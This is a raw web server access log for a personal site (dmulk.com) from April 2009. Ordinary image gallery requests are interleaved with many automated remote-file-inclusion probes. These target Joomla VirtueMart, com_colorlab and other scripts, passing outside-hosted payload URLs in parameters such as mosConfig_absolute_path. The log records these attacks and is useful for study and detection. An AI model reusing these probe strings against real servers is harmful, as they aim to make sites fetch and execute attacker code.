62.28.57.254 - - [02/Apr/2009:09:22:07 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1010.jpg HTTP/1.0" 200 378608 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-090_0.jpg HTTP/1.0" 200 312512 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-099_0.jpg HTTP/1.0" 200 478556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-014_1.jpg HTTP/1.0" 200 521888 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-100_0.jpg HTTP/1.0" 200 441605 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:14 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0158.jpg HTTP/1.0" 200 306017 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-101_0.jpg HTTP/1.0" 200 470262 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-107_0.jpg HTTP/1.0" 200 371028 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-116.jpg HTTP/1.0" 200 504268 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
211.245.159.231 - - [02/Apr/2009:09:22:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://members.mywave.at/m206111aa/cms/administrator/components/com_virtuemart/html/templates/order_emails/v4id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-121_0.jpg HTTP/1.0" 200 474198 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-117_0.jpg HTTP/1.0" 200 525046 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:22:20 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:22:20 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:22:20 -0700] "GET /logs/access_080620.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:22:20 -0700] "GET /logs/access_080830.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-119_0.jpg HTTP/1.0" 200 444844 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:22:22 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:22:22 -0700] "GET /logs/access_080620.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:22:22 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:25 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1026.jpg HTTP/1.0" 200 345929 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-128_0.jpg HTTP/1.0" 200 488795 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-143_0.jpg HTTP/1.0" 200 394995 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:22:28 -0700] "GET /logs/access_081103.log%20%20//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:29 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0164.jpg HTTP/1.0" 200 386584 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:30 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-077_0.jpg HTTP/1.0" 200 393425 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-144_0.jpg HTTP/1.0" 200 456573 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-168.jpg HTTP/1.0" 200 421778 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-159_0.jpg HTTP/1.0" 200 381556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:22:36 -0700] "GET /logs/access_080830.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-160_0.jpg HTTP/1.0" 200 539450 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-170.jpg HTTP/1.0" 200 334647 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:22:38 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:22:38 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:22:38 -0700] "GET /logs/access_080613.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:22:39 -0700] "GET /logs/access_080606.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:40 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-164_0.jpg HTTP/1.0" 200 352144 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:40 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-173.jpg HTTP/1.0" 200 357615 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:22:43 -0700] "GET /logs/access_080811.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:44 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1022.jpg HTTP/1.0" 200 289866 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-186.jpg HTTP/1.0" 200 342411 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-189.jpg HTTP/1.0" 200 464516 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-023_0.jpg HTTP/1.0" 200 348241 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-195.jpg HTTP/1.0" 200 323860 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
211.105.96.41 - - [02/Apr/2009:09:22:47 -0700] "GET /logs/access_080427.log/?env[include_prefix]=http://exploitro.com/forums/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.105.96.41 - - [02/Apr/2009:09:22:47 -0700] "GET /logs/access_080713.log/?env[include_prefix]=http://exploitro.com/forums/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.105.96.41 - - [02/Apr/2009:09:22:48 -0700] "GET /logs/?env[include_prefix]=http://exploitro.com/forums/FX29ID1.txt??? HTTP/1.1" 200 93470 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:49 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0172.jpg HTTP/1.0" 200 364812 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-198.jpg HTTP/1.0" 200 376218 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:52 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-203.jpg HTTP/1.0" 200 303099 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-204.jpg HTTP/1.0" 200 294185 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:57 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:22:59 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1016.jpg HTTP/1.0" 200 304849 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
190.210.39.49 - - [02/Apr/2009:09:23:02 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vemk.artn.ru/site/images/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
218.246.20.221 - - [02/Apr/2009:09:23:02 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.210.39.49 - - [02/Apr/2009:09:23:02 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vemk.artn.ru/site/images/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
190.210.39.49 - - [02/Apr/2009:09:23:02 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vemk.artn.ru/site/images/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
211.105.96.41 - - [02/Apr/2009:09:23:03 -0700] "GET /?env[include_prefix]=http://exploitro.com/forums/FX29ID1.txt??? HTTP/1.1" 200 65555 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:04 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-236.jpg HTTP/1.0" 200 283303 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:05 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0173.jpg HTTP/1.0" 200 357822 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:23:10 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:19 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1011.jpg HTTP/1.0" 200 306043 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-262.jpg HTTP/1.0" 200 494958 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:20 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0149.jpg HTTP/1.0" 200 385604 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:23:22 -0700] "GET /logs/access_071228.log%20%20//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:34 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1018.jpg HTTP/1.0" 200 338681 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:35 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0151.jpg HTTP/1.0" 200 352070 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:23:37 -0700] "GET /logs/access_081001.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:23:37 -0700] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:23:38 -0700] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:09:23:38 -0700] "GET /logs/access_081001.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-238.jpg HTTP/1.0" 200 330560 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
59.16.91.22 - - [02/Apr/2009:09:23:46 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://metalblack.altervista.org/fxid9.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.16.91.22 - - [02/Apr/2009:09:23:46 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://metalblack.altervista.org/fxid9.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.16.91.22 - - [02/Apr/2009:09:23:46 -0700] "GET /logs/access_080905.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://metalblack.altervista.org/fxid9.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:23:47 -0700] "GET /logs/access_081103.log%20%20//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:51 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1017.jpg HTTP/1.0" 200 322953 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:53 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0137_0.jpg HTTP/1.0" 200 385301 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
216.104.37.122 - - [02/Apr/2009:09:23:54 -0700] "GET /logs/access_080412.log/?sourcedir=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:23:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-208.jpg HTTP/1.0" 200 375523 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
216.104.37.122 - - [02/Apr/2009:09:24:02 -0700] "GET /logs/?sourcedir=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 200 93470 "-" "libwww-perl/5.825" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:24:06 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1023.jpg HTTP/1.0" 200 313610 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:24:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-188.jpg HTTP/1.0" 200 484497 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
216.104.37.122 - - [02/Apr/2009:09:24:10 -0700] "GET /?sourcedir=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 200 65555 "-" "libwww-perl/5.825" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:24:10 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0154.jpg HTTP/1.0" 200 344712 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
